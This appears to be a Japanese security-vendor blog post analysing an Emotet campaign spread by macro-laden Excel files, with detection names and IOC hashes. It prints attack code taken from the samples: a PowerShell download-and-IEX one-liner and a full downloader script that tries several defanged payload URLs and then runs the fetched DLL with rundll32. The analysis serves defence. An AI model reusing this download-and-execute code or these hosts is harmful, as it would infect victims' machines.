Excel ファイルを通じて拡散する Emotet マルウェア

ASEC 分析チームは Emotet マルウェアをダウンロードする Excel ドキュメントの拡散が、先月から続いていることを確認した。Excel ファイル内部には以下の画像のようにマクロの有効化を誘導する内容が含まれている。

図1.不正な Excel ファイル1
図2.不正な Excel ファイル2

Excel ファイルには非表示のシートに存在する特定のセルに対してマクロ名のボックスに Auto_Open が指定されており、ユーザーがコンテンツの有効化ボタンをクリックすると、そのセルにある数式が自動で実行される。

図3.Excel ファイルに存在する非表示のシートと名前ボックス

Auto_Open に指定されたセルには、以下のように mshta を実行するコマンドが含まれている。

図4.非表示のシートに存在するコード

hxxp://92.255.57[.]195/ru/ru.html には Powershell コマンドを実行するスクリプトが含まれており、mshta で Powershell を実行して不正な振る舞いを実行する。

図5.ru.html に存在するスクリプト

上記スクリプトによって実行される Powershell コマンドは以下の通りである。

  • powershell -noexit $JI ='(New-Object Net.WebClient).DownloadString(”hxxp://92.255.57[.]195/ru/ru.png”)’; IEX $JI | IEX

この Powershell コマンドによって接続する hxxp://92.255.57[.]195/ru/ru.png には、追加のスクリプトが存在する。このスクリプトには Emotet マルウェアをダウンロードする複数の URL が含まれており、URL に順番に接続して不正な DLL ファイルをダウンロードして C:\Users\Public\Documents\ssd.dll に保存する。その後、rundll32.exe によってダウンロードした不正な DLL ファイルを実行する。

$path = "C:\Users\Public\Documents\ssd.dll";
$url1 = 'hxxp://chicagocloudgroup.com/wp-content/updraft/GBLpmsxC3TJzRT4iX4H/';
$url2 = 'hxxp://mijinogu.com/img/6TIRyK3zmCWqa42lxh/';
$url3 = 'hxxp://vulkanvegasbonus.jeunete.com/wp-content/yQX9yEik3TKo5Gg/';
$url4 = 'hxxps://hammerpzjx.xyz/qatta/VOWHxsTY4TllKdfHIiw/';
$url5 = 'hxxp://comsatnet.com/ComsatNet/Cfga/';
$url6 = 'hxxps://guardagfq.xyz/wp-content/P1ZRZyNP/';
$url7 = 'hxxp://_dc-mx.1b584bc01d04.artichain.finance/doc/LIXRmRqj/';
$url8 = 'hxxp://olgazadonskaya.com/music/SpGFuQkTMwkw0L9yc0/';
$url9 = 'hxxps://a.easeth.work/assets/hBDR/';

$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9".split(",");
foreach ($url in $urls) {
   try {
       $web.DownloadFile($url, $path);
       if ((Get-Item $path).Length -ge 30000) {
           [Diagnostics.Process];
           break;
       }
   }
   catch{}
} 
Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;

ダウンロードされた不正な DLL ファイルは Emotet マルウェアであり、ファイルを実行すると C:\Windows\system32\[ランダム名]\[ランダム名].agc で自己複製、および DllRegisterServer を引数として[ランダム名].agc のファイルを実行する。ファイルを実行すると、内部に存在する複数の C&C サーバアドレスに接続を試み、接続に成功すると攻撃者によるコマンドを受け取って追加のマルウェアダウンロード等の不正な振る舞いを実行することができる。

この Excel ファイルは電子メールを通じて配布されるため、送信者が不明なメールに対するユーザーの注意が要求される。また、Emotet マルウェアは以前から Word や Excel 等のドキュメントファイルを通じたダウンロードが確認されているため、出どころが不明なドキュメントファイルのマクロを使用しないようにしなければならない。

V3 では、当該マルウェアに対して以下の通り検知している。

[ファイル検知]

  • Downloader/XLS.Generic
  • Malware/Win.Generic.R466206

[IOC 情報]

  • 3e8142e24f51fe068008092a5ba10388
  • 519525d3fa350c5c842cf446258a5af9
  • e2baebf4d9bcbfe4a8ce7df6a52e2baa

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

0 0 votes
評価する
guest
3 コメント
Inline Feedbacks
View all comments
trackback

[…] ASEC 分析チームは最近、Emotet マルウェアをダウンロードする不正な Excel ドキュメントが活発に出回っていることを確認した。先月「Excel ファイルを通じて拡散する Emotet マルウェア」で、このタイプのマルウェアについて紹介したことがある。当初はマクロシートを利用したタイプの Excel ドキュメントのみが確認されていたが、最近は VBA マクロを利用して不正な振る舞いを実行するタイプも追加された。 […]

trackback

[…] Excel ファイルを通じて拡散する Emotet マルウェア […]